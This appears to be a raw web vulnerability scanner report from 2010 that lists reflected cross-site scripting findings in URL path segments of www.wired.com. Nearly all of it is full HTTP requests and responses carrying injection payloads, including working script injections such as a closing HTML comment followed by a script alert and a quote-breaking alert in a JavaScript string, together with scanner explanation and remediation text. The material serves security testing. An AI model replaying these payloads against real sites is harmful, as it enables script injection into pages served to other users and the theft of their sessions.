GET /techbiz105cf"><a>2b48aae5947/people HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:15 GMT Date: Sun, 21 Nov 2010 23:13:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz105cf"><a>2b48aae5947 ss_people"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7412d"><a>a492ab7c0f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/people7412d"><a>a492ab7c0f7 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=581 Expires: Sun, 21 Nov 2010 23:23:26 GMT Date: Sun, 21 Nov 2010 23:13:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_people7412d"><a>a492ab7c0f7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4ec"><a>b21ee57f40a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz7c4ec"><a>b21ee57f40a/startups HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Sun, 21 Nov 2010 23:17:12 GMT Date: Sun, 21 Nov 2010 23:13:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz7c4ec"><a>b21ee57f40a ss_startups"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebc6"><a>440513c64db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/startups8ebc6"><a>440513c64db HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Cache-Control: max-age=553 Expires: Sun, 21 Nov 2010 23:23:09 GMT Date: Sun, 21 Nov 2010 23:13:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_startups8ebc6"><a>440513c64db"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63498"><a>895b28be6ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba3b0"><a>461b3fd1bab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87df"><a>50a8217cd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /userf87df"><a>50a8217cd8e/logout HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29338 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:42 GMT Date: Mon, 22 Nov 2010 01:08:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_userf87df"><a>50a8217cd8e ss_logout"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70dfe"><a>d376a663b5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /user/logout70dfe"><a>d376a663b5f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:38 GMT Content-Length: 29338 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_user ss_logout70dfe"><a>d376a663b5f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4d9d"><a>3e10b0ccb95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /userc4d9d"><a>3e10b0ccb95/registration HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 22:12:39 GMT Date: Sun, 21 Nov 2010 22:08:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_userc4d9d"><a>3e10b0ccb95 ss_registration"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 448ce"><a>b37556daedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /user/registration448ce"><a>b37556daedd HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Expires: Sun, 21 Nov 2010 22:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Nov 2010 22:09:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_user ss_registration448ce"><a>b37556daedd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d5"><a>c3b051b443f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video9d3d5"><a>c3b051b443f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29323 Vary: Accept-Encoding Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 01:13:27 GMT Date: Mon, 22 Nov 2010 01:08:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video9d3d5"><a>c3b051b443f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f3df"><a>3f6a5eb5ba0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video6f3df"><a>3f6a5eb5ba0/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29324 Vary: Accept-Encoding Cache-Control: max-age=275 Expires: Sun, 21 Nov 2010 20:02:51 GMT Date: Sun, 21 Nov 2010 19:58:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video6f3df"><a>3f6a5eb5ba0"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ed94e--><script>alert(1)</script>ca386b88b06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoed94e--><script>alert(1)</script>ca386b88b06/alt-text HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:52:44 GMT Date: Mon, 22 Nov 2010 00:48:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoed94e--><script>alert(1)</script>ca386b88b06/alt-text --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ff3"><a>102785f865 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video30ff3"><a>102785f865/alt-text HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:51:59 GMT Date: Mon, 22 Nov 2010 00:47:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video30ff3"><a>102785f865 ss_alt-text"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef29"><a>6775e296f7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/alt-text9ef29"><a>6775e296f7d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=270 Expires: Mon, 22 Nov 2010 00:52:34 GMT Date: Mon, 22 Nov 2010 00:48:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_alt-text9ef29"><a>6775e296f7d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4866"-alert(1)-"6c561f6f03b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/alt-textc4866"-alert(1)-"6c561f6f03b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:07 GMT Date: Mon, 22 Nov 2010 00:49:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 2fae8--><script>alert(1)</script>093987d625e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video2fae8--><script>alert(1)</script>093987d625e/avatar-extended-collectors-edition/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29457 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:46 GMT Date: Mon, 22 Nov 2010 00:54:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video2fae8--><script>alert(1)</script>093987d625e/avatar-extended-collectors-edition/628119810001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40544"><a>75e6bfb0ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video40544"><a>75e6bfb0ef/avatar-extended-collectors-edition/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29422 Vary: Accept-Encoding Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:58:55 GMT Date: Mon, 22 Nov 2010 00:54:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video40544"><a>75e6bfb0ef ss_avatar-extended-collectors-edition c_628119810001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30cf"><a>691b350cceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/avatar-extended-collectors-editiond30cf"><a>691b350cceb/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:59 GMT Date: Mon, 22 Nov 2010 00:54:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106693
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_avatar-extended-collectors-editiond30cf"><a>691b350cceb c_628119810001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 305ca"-alert(1)-"f052dbfe7ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/avatar-extended-collectors-edition305ca"-alert(1)-"f052dbfe7ac/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 01:00:43 GMT Date: Mon, 22 Nov 2010 00:55:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
